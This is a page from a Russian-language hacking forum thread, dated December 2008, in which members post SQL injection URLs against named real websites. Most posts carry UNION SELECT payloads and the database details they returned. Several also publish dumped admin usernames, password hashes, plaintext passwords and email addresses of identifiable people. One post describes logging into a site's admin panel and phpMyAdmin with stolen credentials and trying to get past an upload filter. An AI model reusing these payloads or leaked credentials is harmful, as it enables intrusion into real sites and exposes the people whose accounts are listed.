ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7111  
Старый 14.12.2008, 23:52
Аватар для dr.Pilulkin
dr.Pilulkin
Познающий
Регистрация: 03.06.2007
Сообщений: 44
Провел на форуме:
418827

Репутация: 48
По умолчанию

h__p://www.pdaplaza.com/shop.php?catid=18&id=-737+union+select+1,2,3,4,5,user(),7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33,34,35,36,37,38,39,40,41,42--

pdaplaza_pda@localhost
4.1.22-standard

Table [admins]
admin_email
admin_id
admin_pwd
admin_name
admin_uid

Возможно есть другие колонки

Phillip:5e6cbfce52f55b0b3065b6806a7d5d41:info@pdap laza.com
supervisor:d943b780e979b19baa64c243d26669b1:info@p daplaza.com
Kovacs Robert:19640501:kovacs@pdaplaza.com

5e6cbfce52f55b0b3065b6806a7d5d41artisan08

админка хз где
 
Ответить с цитированием

  #7112  
Старый 15.12.2008, 00:15
Аватар для masternet
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

http://www.pinnacleproactive.co.uk/resources/events/book.php?Id=-1+union+select+1,2,concat(username,0x3a,password), 4,5,6,7,8,9,10,11,12+from+admin--
http://www.pinnacleproactive.co.uk/edit/
PR: 3
----------------
http://www.ciritas.ru/product.php?id=-1+union+select+1,2,concat_ws(char(32,45,32),versio n(),user(),database()),4,5,6,7,8,9--
4.1.22-log - ciritas5_website@localhost - ciritas5_ciritas
------------------------
http://www.domkino.spb.ru/description.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(group_c oncat(login,0x3a,password,0x3a,total_score))),11,1 2+from+user--
-----------------
 
Ответить с цитированием

  #7113  
Старый 15.12.2008, 04:33
Аватар для попугай
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Поздравьте меня - моя первая самостоятельная скуля))

Французики.

http://www.isep.fr/histelcon/public/page.php?nump=-16+union+select+concat_ws(0x3a,database(),user(),v ersion())/*

histel histel@localhost 5.0.32-Debian_7etch6-log

http://www.isep.fr/histelcon/public/page.php?nump=-16+union+select+concat_ws(0x3a,login,pass)+from+hi stel.users+limit+0,1/*

admin:2008histel логин и пасс от админки
http://www.isep.fr/histelcon/admin/

они же подходят и к phpmyadmin - http://www.isep.fr/phpmyadmin

Увы, на этом всё обрывается, файловых привилегий нет, а админка весьма скудная в средствах. Есть только простенькая форма аплоада http://www.isep.fr/histelcon//admin/envoyer_fichier.php, но как я не бился, заставить принимать файлы с расширениями, отличными от pdf, doc и ppt , не удалось.. нулевой байт не проходит и прочие фишки...
Причем при аплоаде проверка идет только по расширению, не по типу файлов...
 
Ответить с цитированием

  #7114  
Старый 15.12.2008, 13:46
Аватар для Twoster
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию

Цитата:
http://english.dvb.no/textonly/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21--
Цитата:
http://www.art-nouveau.hu/art.php?menuid=2&id=-1+union+select+1,2,3--
Цитата:
http://www.osagyefotheatre.org.uk/story.php?id=-1+union+select+1,2,3--
Цитата:
http://www.ssfb.ro/news.php?id=-1+union+select+1,2,3,4,5,6,7--
Цитата:
http://bevalex.by/news.php?id=-1+union+select+1,2,3,4,5--
Цитата:
http://www.mvp.gomel.by/news.php?id=-1+union+select+1,2,3,4,5,6,7--
Цитата:
http://techinvest.com.ua/print.php?type=page&lang=en&id=-1+union+select+1,2,3,4,5,6,7,8,9+from+users--
Цитата:
http://pervomaisk.mk.ua/print.php?file=rishenia&r=act&id=-1+union+select+1,2--
Цитата:
http://www.usdp.kiev.ua/print.php?mid=157&action=print&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Цитата:
http://www.sadochek.com.ua/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19--
Цитата:
http://democracy.ru/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- (PR 5, ТИЦ 550)
Цитата:
http://www.vaal.ru/print.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11--
Цитата:
http://www.2kaudit.ru/print.php?t=news&id=-1+union+select+1,2,3,4,5,6,7,8-- (PR 6)
Цитата:
http://www.autospektr.ru/print.php?mode=full&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24--
Цитата:
http://www.planopestcontrol.com/page.php?id=-1+union+select+1,2,3,4,5,6,password,8,9,10,11,12,1 3,14,15+from+admin--
Цитата:
http://www.ief.hr/page.php?id=-1+union+select+1,2,3,4--
Есть сайты с нормальным PR, а некоторые просто "г**но-сайты"...
 
Ответить с цитированием

  #7115  
Старый 15.12.2008, 16:07
Аватар для satana8920
satana8920
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187

Репутация: 369


Отправить сообщение для satana8920 с помощью ICQ
По умолчанию

Вот от меня
PR 4
сайт: www.sbbs.ru
уязвисомть:
Код:
http://www.sbbs.ru/news/index.php?id=999999999999999999+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13/*
Код:
user(ivolgaru_news@localhost)
version(4.1.22-lk-log)
database(ivolgaru_news)
PR 4
сайт: http://globus.mp21.ru
уязвисомть:
Код:
http://globus.mp21.ru/topics.php?ID=99999999999999+union+select+1,version(),3,4,5,6,7,8,9/*
Код:
user(mp21ru_globus@localhost)
version(4.1.22-standard)
database(mp21ru_globus)
RP 0
сайт: http://www.interp.ru/
уязвисомть:
Код:
http://www.interp.ru/index.php?id=-3+union+select+1,2,3,4,5,6,7,version(),9,10/*
Код:
user(interp@localhost)
version(4.1.22-log)
database(wwwinterpru)
RP 4
сайт: http://ecom-info.spb.ru/
уязвисомть:
Код:
http://ecom-info.spb.ru/monitoring/print.php?id=-208+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26--
Код:
user(u9116@10.10.223.234)
version(5.0.24a)
database(u9116_2)
RP 5
сайт: http://www.omskdrama.ru
уязвисомть:
Код:
http://www.omskdrama.ru/wwwroot/index.php?gid=-104+union+select+1,2,version(),4,5,6,7/*
Код:
user(drama@localhost)
version(4.1.22)
database(drama)
PS Вся жизнь театр ,а люди в нем актеры )

RP 4
сайт: http://www.allaces.ru/
уязвисомть:
Код:
http://www.allaces.ru/p/episode.php?id=-444+union+select+1,2,3,4,version()--
Код:
user(ecom@localhost)
version(5.0.67-log)
database(ecom)
RP 4
сайт: http://www.genoterra.ru/
уязвисомть:
Код:
http://www.genoterra.ru/news/comment.php?id=-938+union+select+1,2,3,4,5,6,7,8,version(),10,11,12/*
Код:
user(genoterra@localhost)
version(4.1.21-standard-log)
database(genoterra)

Последний раз редактировалось satana8920; 15.12.2008 в 16:10..
 
Ответить с цитированием

  #7116  
Старый 15.12.2008, 19:36
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Фанатам Диабло старкрафта варкрафта.....

http://strategy.diabloii.net/searchcat.php?cid=36+union+select+1,version(),3,us er(),database(),6,7/*

Database Version: 5.0.42-log
Database name: stratd2
User name: d2strategy@localhost

С мускула логины и пароли

root *CD3F739E436C54FDC8B2D2F844C223817ACC2118
starcraftwire *1EA1E1C7B33A1318B8FFDF44C89E34E2B43418DA
d2strategy *DC960B6A83F5D1D7738DB7B4C80DABA9F5702647
blizzpages *1FA34052F3B051E4323ADFD5EDA04CF183F3A79E
aocforums *7574F9535B810D513B4C9C2F8C33EF0B6BEDC98B
aocgallery *1A336A2F564A40CF1348ACB80627E95259B3B549
aocring *60F70737C92FA05993090552F9750EA92E5805DB
starcraftwiki *91D00EE01412A5447CAD8BD8443949557FB00E30
starcraft-2763 *23CB9564F4A8C2818F6C6EFFBD5018B170236F8D

В общем там несколько замечательных хоста....)

А теперь закончим начатое.
Довольно крупное диз агенство пароли так и не подобрал

http://www.marotori.com/news.php?id=2+union+select+1,2,3,concat_ws(0x3a3a, user_id,user_name,user_password,user_email),5,6+fr om+users--

MD5(UNIX)
root::$1$K6ORGtcZ$wQuds2xEEzYFc7BnHHgel0
admin::$1$6DUI484h$0cQV5wcSIVoXH5q5k8mTe.


Ну и попроще :

http://www.replocate.com/category.php?id=-8+union+select+concat_ws(0x3a3a,version(),user(),d atabase())/*

version: Industry: 5.0.45-log
user: rl-user@10.0.0.2
database: replocate

http://www.nsgroupllc.com/news.php?id=-11+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database())/*

version: 5.0.32-Debian_7etch8-log
user: nsg_read_only@localhost
database: nsg

http://www.lo-cal.com/eventinfo.php?event_ID=266+union+select+version(), user(),3,4,5,6,7,8,9,10,database(),12,13+limit+1,1/*

version: 4.1.22-standard
user: localftp_localmu@localhost
database: localftp_localmusic

http://mutualideas.com/projects.php?id=-47+union+select+1,2,concat_ws(0x3a3a,version(),use r(),database()),4,5,6,7,8,9--

version:5.0.32-Debian_7etch1-log
user:mysql2908@localhost
database:db2908_mutual04


http://www.parsiteb.com/combinational.php?table=combinational&id=-19+union+select+1,version(),3,4,user(),database(), 7,8,9,10,11,12,13--&action=viewFullContent

version: 5.0.45-community
user: parsiteb_parsite@localhost
database: parsiteb_parsitebdatabase
 
Ответить с цитированием

  #7117  
Старый 15.12.2008, 21:10
Аватар для Cennarios
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
Отправить сообщение для Cennarios с помощью ICQ
По умолчанию

http://www.havanaclub.cz/boutique/?act=8&pid=-1+union+select+1,2,concat_ws(0x3a3a,login,passwd), 4,5,6,7,8,9,10+from+admin_users+limit+0,1/*

login: david
pass:david

ЛОЛ
 
Ответить с цитированием

  #7118  
Старый 15.12.2008, 23:47
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Все срочно идём в магазин за Катанами и всякой такой китайской штукой -) или японской не силён в этом -)

http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,concat_ws(0x3a3a,version(),us er(),database())/*

Database Version: 5.0.45
Database name: kitanaru
User name: kitanaru@localhost

Таблица personal

id:loginsw:type:fio:email

2:ANDR:dbe679f999e91a255b5b4ecb9303f888:1:Горя чев:adm@kitana.ru password:CJRJKJDF
3:777:c7411e168031e804e9f35fbc362ef87c:2:Евге ий Васильевичpt@berbut.ru password:: 1G0
5:OLEG:3767d0c6335a92c2364dca739c3b0c23:1:Цыбу льский Олегleg@kitana.ru password: XTHYJD
 
Ответить с цитированием

  #7119  
Старый 16.12.2008, 00:19
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Ну и на сегодня последнее поразвлекаться в игрушки ......

http://www.novelgames.com/flashgames/category.php?id=11+union+select+1,2,3,4,concat_ws( 0x3a3a,version(),user(),database()),6,7,8--

version: 4.1.10-log
user : novelgames@localhost
database:novelgames

Далее достаём всё сами я чисто админчеГа поднял и норма *)
Пароли в открытом виде.Сделали нам одолжения *)

http://www.novelgames.com/flashgames/category.php?id=11+union+select+1,2,3,4,concat_ws( 0x3a3a,id,name,password,email),6,7,8+from+players+ limit+9,1--

1 :: Peter Lee :: boul3lam :: peter@novelgames.com

Всё спокойной ночи вам!
 
Ответить с цитированием

  #7120  
Старый 16.12.2008, 00:20
Аватар для masternet
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

http://faceup.ie/article/index.php?ID=-1+union+select+1,2,3,4,5,concat_ws(0x3a,ID,usernam e,password,level),7,8,9,10,11,12+from+tbl_adminare a--
http://faceup.ie/admin
403 error нет доступа(
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ